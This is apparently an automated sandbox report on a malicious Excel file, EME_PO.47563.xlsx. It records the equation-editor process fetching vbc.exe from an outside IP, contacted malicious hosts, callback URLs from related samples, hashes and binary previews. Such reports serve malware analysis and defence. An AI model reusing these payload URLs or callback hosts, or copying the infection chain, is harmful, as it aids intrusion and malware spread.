http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
74.208.236.61	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
102.141.201.70	unknown	Seychelles	328543	sun-asnSC	true
67.195.197.25	unknown	United States	26101	YAHOO-3US	true
192.227.129.22	unknown	United States	36352	AS-COLOCROSSINGUS	true
209.126.13.151	unknown	United States	40021	CONTABOUS	true
23.227.38.74	unknown	Canada	13335	CLOUDFLARENETUS	true
156.235.143.6	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
184.168.131.241	unknown	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323358
Start date:	26.11.2020
Start time:	21:11:49
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	EME_PO.47563.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@9/6@13/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 36.5% (good quality ratio 34.6%) Quality average: 74.2% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 94% Number of executed functions: 104 Number of non-executed functions: 43
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:15:57	API Interceptor	51x Sleep call for process: EQNEDT32.EXE modified
21:15:59	API Interceptor	72x Sleep call for process: vbc.exe modified
21:16:20	API Interceptor	220x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.195.197.25	7OKYiP6gHy.exe	Get hash	malicious	Browse	www.bestpodstudio.com/mz59/?DxlpdH=z/+6kJkwZlQ3zlrDh4QpXoSyzw+77qJSyUli2W5ZA+NNv7nK+Cazy2/hoyzn+UXLJ9fD&k2Jxtb=fDHHbT_hY
192.227.129.22	PRODUCT INQUIRY BNQ1.xlsx	Get hash	malicious	Browse	192.227.129.22/vbc.exe
	P.O_ 39134.xlsx	Get hash	malicious	Browse	192.227.129.22/vbc.exe
	EME.39134.xlsx	Get hash	malicious	Browse	192.227.129.22/vbc.exe
209.126.13.151	7OKYiP6gHy.exe	Get hash	malicious	Browse	www.hostingbisniz.com/mz59/?DxlpdH=OW9WwwQZQ7zpOH1UiXZ2qNcRwznn7rmsJyPoqW3tiXRjMb9qVkHQSNqCtatCKZD/Llsl&k2Jxtb=fDHHbT_hY
23.227.38.74	Shipping documents.xlsx	Get hash	malicious	Browse	www.cocogreensoil.com/sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj
	PO98765.exe	Get hash	malicious	Browse	www.bloochy.com/sbmh/?4hLtM4=skYwVssfaMrhlhDh0By1+2yNFudwvP+0WfyEru4f7dWeU3QH+Wh99HLFJYHhc5Wxp3Js&n0DXRn=xPJxZNG0xPz
	inv.exe	Get hash	malicious	Browse	www.nairobi-paris.com/hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4
	EME_PO.39134.xlsx	Get hash	malicious	Browse	www.smartropeofficial.com/mz59/?VrGd-0=igsD6CIxfIdP/BmaDcqJRhdi7opbp9JZE0pffGSxnJfYzYphWR5FxPFRxokm8KQT47JnMg==&MDKtU=Jxotsl4pOvw
	Shipment Document BLINV And Packing List Attached.exe	Get hash	malicious	Browse	www.veryinteresthing.com/bg8v/?DXIXO=Ci+8b5yVi0HjeRDPketSQzJsjy9TvJsNh1v2CR5lKm1ZvVcQvafggDw5DTXIkkN2hOV2&Jt7=XPv4nH2h
184.168.131.241	inv.exe	Get hash	malicious	Browse	www.bitcoincandy.xyz/hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w==
	Payment - Swift Copy.exe	Get hash	malicious	Browse	www.mercedes-dieselclaims.com/mnc/?NR0=XnzLeNl8&-ZU=vOGmWWeyo6tiCd2B1+89qezWOIY3ON5shOccvWZd7PNL2gKjBNGJbs+lhzDH6ySQETa7
	EME_PO.39134.xlsx	Get hash	malicious	Browse	www.cna-notary.com/mz59/?VrGd-0=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA==&MDKtU=Jxotsl4pOvw
	7OKYiP6gHy.exe	Get hash	malicious	Browse	www.cna-notary.com/mz59/?DxlpdH=2h5hbT81vAGrz2+4FBHdrVji2gh81Syn3NmYk9TvOglr7t1sHr82BL85hTGCcGVEIodg&k2Jxtb=fDHHbT_hY
	kayx.exe	Get hash	malicious	Browse	www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	www.crestviewlab.com/gyo3/?Ez=NAGhR2B897xHmSjBg9ib6asY38nnY4Q4yyZMB+Gj9us/EkxfPSnFK1AIwmtjw0HkqurxQu+N+g==&lhud=TjfdU2S
	MV.KMTC JEBEL ALI_pdf.exe	Get hash	malicious	Browse	www.carwashcustom.com/y9z/?uFQl=fY5jeAtp1RdNWaxm5n6iTAw0V/8P2zZ8OtxyEaiRQwZkZsJ+cMlcko/IfBrIT9W4DRCI&CTvp=fv10_lYhrxJtW6
	PO0119-1620 LQSB 0320 Siemens.exe	Get hash	malicious	Browse	www.fluidartindia.com/sppe/?DnadT=jX6zF4/w1i207zkr1riL1VOogE6y0WgJJqDlfpP213KajKiR8CXisvGZ1eNGgJa3LVxH&DxlLi=2dmX
	PROOF OF PAYMENT.exe	Get hash	malicious	Browse	www.fastsalvage.com/mua8/?nflpdH=B0qyrwayxD8wcQG3Qbr3RYD+R2QNZFulkGJHcFvF3VxCu8MwJpoGpma0wXvOyVIO8Q3D&w48t=0pY022IXUBwLfpfP
	POSH XANADU Order-SP-20-V241e.xlsx	Get hash	malicious	Browse	www.upgradetomastery.com/dtn/?8ptdvJ=KT0pXTAPFjE0&lb=VKiUsABvcSkQZcVKnfuC8vDN1G6FwU6V98eOKuQh0UKncmK0g9i99ZESG6mkSNKYPbsfxw==
	jrzlwOa0UC.exe	Get hash	malicious	Browse	www.enerjikbilin.com/t4vo/?Dxlpd=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2U01Umj+Zu9uG7hEQ==&lhuh=TxlhfFN
	PDF ICITIUS33BUD10307051120003475.exe	Get hash	malicious	Browse	www.applywithrand.com/iic6/?DV8TCr-=yPIpthC5MtqHoy4c0EHwGIh2/j/8JQggFFSPND+1HWd+sJXvHNRkMzNQskTglzxbquBo&U0DH6=kf50d0Dh3Z44mV
	Invoice.exe	Get hash	malicious	Browse	www.forsythcourtseniorliving.com/rhk/?2dtd9h=mjpPyjuxPhk0&3f=zT6q1JDKfhV2EvEX8/2jysHCuf0tBNhQsP2YiyzGtHytBzTfjT3OdZVqaOBr+/tLjoXCZ7lNZQ==
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.qubitlaboratories.com/o9b2/?J484=xPJtLXbX&u6u4=3LGybaBE5u/MmrsyhaNWg7uW/vPINQPoFsX0YN7a6o2wuLOqT6PUoiZZCA7i0eNZ3qK2
	Invoice.exe	Get hash	malicious	Browse	www.bitcoincandy.xyz/hko6/?7nE8Zrx=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKD9kUp/tb+4v&LXed=XPUxDVP8ThYHYxS0
	ALPHA_PO_16201844580.exe	Get hash	malicious	Browse	www.timberlinepallets.com/ihj8/?FDHH=Cnt+6nHyGXRUU+110cZEsnWWKj+9Yye+cLBJL0AmBtVe9ccrmOicj2d+yDCCaYm3sR4n&Rl=VtxXE
	QFCPrfsJLeeYpN5.exe	Get hash	malicious	Browse	www.outsourcedbim.com/k8b/
	nnnf.exe	Get hash	malicious	Browse	www.cheap-housekeeping.com/bns/?uVg8=DFuD2CwFEFTZMlFq3QqcpFj8rgjdPttxv8Nv7PXL+ekRjc0K8Zw+qc+ng0ER0qX/SACF&R48Hj=NtxpKjcxbp2XFTE
	iz06VVmz0l.exe	Get hash	malicious	Browse	www.maskupforschool.com/d8h/?rVOp32=b4AuRmO5mJIYTa03Ryq3knCjLs8pOUSKEouWqDiq2O5vgkJvPoAU5b8ioX3ikWgjFYnw&GV2p=8pMx2630Gf6TGP
	0VikCnzrVT.exe	Get hash	malicious	Browse	www.enerjikbilin.com/t4vo/?2db=X48HMfxHf&-Z8=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2UNqlGgwPy6uG7mXg==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
sbsfe-p11r.geo.mf0.yahoodns.net	7OKYiP6gHy.exe	Get hash	malicious	Browse	67.195.197.25
sbsfe-p11r.geo.mf0.yahoodns.net	SWIFT TRANSFER.exe	Get hash	malicious	Browse	67.195.197.25
shops.myshopify.com	Shipping documents.xlsx	Get hash	malicious	Browse	23.227.38.74
	PO98765.exe	Get hash	malicious	Browse	23.227.38.74
	inv.exe	Get hash	malicious	Browse	23.227.38.74
	EME_PO.39134.xlsx	Get hash	malicious	Browse	23.227.38.74
	Shipment Document BLINV And Packing List Attached.exe	Get hash	malicious	Browse	23.227.38.74
	Swift Copy.exe	Get hash	malicious	Browse	23.227.38.74
	Inv.exe	Get hash	malicious	Browse	23.227.38.64
	CSq58hA6nO.exe	Get hash	malicious	Browse	23.227.38.64
	New Order .xlsx	Get hash	malicious	Browse	23.227.38.64
	NQQWym075C.exe	Get hash	malicious	Browse	23.227.38.64
	Order specs19.11.20.exe	Get hash	malicious	Browse	23.227.38.64
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	23.227.38.64
	SWIFT_HSBC Bank.exe	Get hash	malicious	Browse	23.227.38.64
	ORDER SPECIFITIONS.exe	Get hash	malicious	Browse	23.227.38.64
	anthony.exe	Get hash	malicious	Browse	23.227.38.64
	udtiZ6qM4s.exe	Get hash	malicious	Browse	23.227.38.64
	qAOaubZNjB.exe	Get hash	malicious	Browse	23.227.38.64
	uM0FDMSqE2.exe	Get hash	malicious	Browse	23.227.38.64
	new file.exe.exe	Get hash	malicious	Browse	23.227.38.64
	jrzlwOa0UC.exe	Get hash	malicious	Browse	23.227.38.64

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	fSBya4AvVj.exe	Get hash	malicious	Browse	74.208.236.48
	PO987556.exe	Get hash	malicious	Browse	217.160.0.166
	Inv.exe	Get hash	malicious	Browse	217.160.0.173
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	74.208.236.115
	Order specs19.11.20.exe	Get hash	malicious	Browse	217.160.0.74
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	74.208.236.115
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	217.160.0.92
	http://www.winter-holztechnik.de/	Get hash	malicious	Browse	217.160.0.67
	Re- attached Instruction.xlsx	Get hash	malicious	Browse	82.165.48.223
	docs.html	Get hash	malicious	Browse	74.208.236.216
	Prueba de pago.exe	Get hash	malicious	Browse	217.76.146.62
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	217.160.0.224
	Narud#U017eba 0521360021.xlsx	Get hash	malicious	Browse	74.208.22.240
	Quote Request.xlsx	Get hash	malicious	Browse	82.165.48.223
	anthony.exe	Get hash	malicious	Browse	217.160.0.199
	8miw6WNHCt.exe	Get hash	malicious	Browse	74.208.5.21
	WO4jeXWl0L.exe	Get hash	malicious	Browse	74.208.45.104
	5YCsNuM4a9.exe	Get hash	malicious	Browse	74.208.45.104
	eLaaw7SqMi.exe	Get hash	malicious	Browse	74.208.5.22
	vi9qEkXlGm.exe	Get hash	malicious	Browse	217.76.150.19
sun-asnSC	0VikCnzrVT.exe	Get hash	malicious	Browse	102.134.56.244
	PI210941.exe	Get hash	malicious	Browse	102.134.56.244
	WQA101320.exe	Get hash	malicious	Browse	102.134.56.244
	fT2aAFPT1F.exe	Get hash	malicious	Browse	102.134.58.12
	fT2aAFPT1F.exe	Get hash	malicious	Browse	102.134.58.12
AS-COLOCROSSINGUS	Shipping documents.xlsx	Get hash	malicious	Browse	216.170.126.121
	document-2009439254.xls	Get hash	malicious	Browse	198.46.155.18
	document-2009439254.xls	Get hash	malicious	Browse	198.46.155.18
	document-1940099967.xls	Get hash	malicious	Browse	198.46.155.18
	document-1940099967.xls	Get hash	malicious	Browse	198.46.155.18
	document-2020425077.xls	Get hash	malicious	Browse	198.46.155.18
	document-2020425077.xls	Get hash	malicious	Browse	198.46.155.18
	document-1851433106.xls	Get hash	malicious	Browse	198.23.156.170
	document-1851433106.xls	Get hash	malicious	Browse	198.23.156.170
	document-1959916382.xls	Get hash	malicious	Browse	198.23.156.170
	document-1959916382.xls	Get hash	malicious	Browse	198.23.156.170
	document-2078943362.xls	Get hash	malicious	Browse	198.46.155.18
	document-1999796651.xls	Get hash	malicious	Browse	198.46.155.18
	document-2078943362.xls	Get hash	malicious	Browse	198.46.155.18
	document-1999796651.xls	Get hash	malicious	Browse	198.46.155.18
	document-189497319.xls	Get hash	malicious	Browse	198.23.156.170
	document-2004587833.xls	Get hash	malicious	Browse	198.23.156.170
	document-189497319.xls	Get hash	malicious	Browse	198.23.156.170
	document-184003024.xls	Get hash	malicious	Browse	198.23.156.170
	document-2004587833.xls	Get hash	malicious	Browse	198.23.156.170
YAHOO-3US	7OKYiP6gHy.exe	Get hash	malicious	Browse	67.195.197.25
	8miw6WNHCt.exe	Get hash	malicious	Browse	74.6.136.150
	0P0cZbXEbK.exe	Get hash	malicious	Browse	67.195.204.75
	uvjAwriS1c.exe	Get hash	malicious	Browse	67.195.204.80
	ZYhucZndrm.exe	Get hash	malicious	Browse	67.195.204.77
	Zped7c3dam.exe	Get hash	malicious	Browse	67.195.204.77
	bLPTjx97o4.exe	Get hash	malicious	Browse	67.195.204.73
	AC1EXbN0nE.exe	Get hash	malicious	Browse	67.195.204.79
	Ohb6q4Utz8.exe	Get hash	malicious	Browse	67.195.204.72
	Z7wySV8sRC.exe	Get hash	malicious	Browse	67.195.204.75
	NmoVPyVD86.exe	Get hash	malicious	Browse	67.195.204.77
	zG8cVHvxat.exe	Get hash	malicious	Browse	98.139.175.225
	DOC_PDF1.exe	Get hash	malicious	Browse	74.6.141.46
	GPSOpSQQHn.exe	Get hash	malicious	Browse	67.195.204.73
	SecuriteInfo.com.Trojan.Siggen10.14421.6375.exe	Get hash	malicious	Browse	67.195.204.74
	SecuriteInfo.com.Trojan.Siggen10.14421.24699.exe	Get hash	malicious	Browse	67.195.204.79
	dOtSDl5N2j.exe	Get hash	malicious	Browse	67.195.204.73
	pLHcPFCu5N.exe	Get hash	malicious	Browse	67.195.204.73
	bmQ420M9JO.exe	Get hash	malicious	Browse	67.195.204.73
	sKu7FoPlk3.exe	Get hash	malicious	Browse	67.195.204.73

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	515072
Entropy (8bit):	7.4607975468542165
Encrypted:	false
SSDEEP:	12288:qEEoEPCriH+klc6V1OqjciM8RHK/9ZzCsC2iQmkLa8tt8LF:DNiMp/9Zzq2iYLR8
MD5:	4A105D55BFF1F7304E01CE7198BADA6B
SHA1:	423AF325F62A4B075CAA8422A36C3A3E2426C2B8
SHA-256:	BAB96ED17C1226911DE27241224E33A3257BBEC0408A4E311167E2C972B39C3E
SHA-512:	48A337B15B0ED67F8CD3D4D136BD6A29F492777EBBD755281AE99AC8EF7E82696C4947C57509235EFEA5C02EAB18911AD7970A5AF913D469933E6D90898793BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Reputation:	low
IE Cache URL:	http://192.227.129.22/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............0.................. ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......H................................................................0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3...s....}.....~....}.....(.......(......0.............(........(.......................0..4........r...p(.............s....}........{......(....}....:..{....(....&..0..................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46B6EF3.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.015335768317307
Encrypted:	false
SSDEEP:	3072:KXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:IahIFdyiaT2qtXw
MD5:	B74BAFC856BD93ADEC1905438AD0D8B5
SHA1:	5DAE3A28DD5F8E0CF0CADAEA61F56638829F80C7
SHA-256:	85EA8291C352F53D27668F058AB273A227040E104A09772A5D5A463AC2EF42FA
SHA-512:	726F74535A46135155CB8ED0B251CBB70FC1F8F296117C48148BB4646D2098F1797BAA91CFD6FE02CA07633524BDCF8A6775646AB308898CCF2525B962485690
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................P........N.QP...H...........4....N.QP...H... ....yTPH...P... ............zTP............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...H...\|....2MP.................{KP............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A10CF879.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD647458.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\Desktop\~$EME_PO.47563.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	515072
Entropy (8bit):	7.4607975468542165
Encrypted:	false
SSDEEP:	12288:qEEoEPCriH+klc6V1OqjciM8RHK/9ZzCsC2iQmkLa8tt8LF:DNiMp/9Zzq2iYLR8
MD5:	4A105D55BFF1F7304E01CE7198BADA6B
SHA1:	423AF325F62A4B075CAA8422A36C3A3E2426C2B8
SHA-256:	BAB96ED17C1226911DE27241224E33A3257BBEC0408A4E311167E2C972B39C3E
SHA-512:	48A337B15B0ED67F8CD3D4D136BD6A29F492777EBBD755281AE99AC8EF7E82696C4947C57509235EFEA5C02EAB18911AD7970A5AF913D469933E6D90898793BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............0.................. ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... 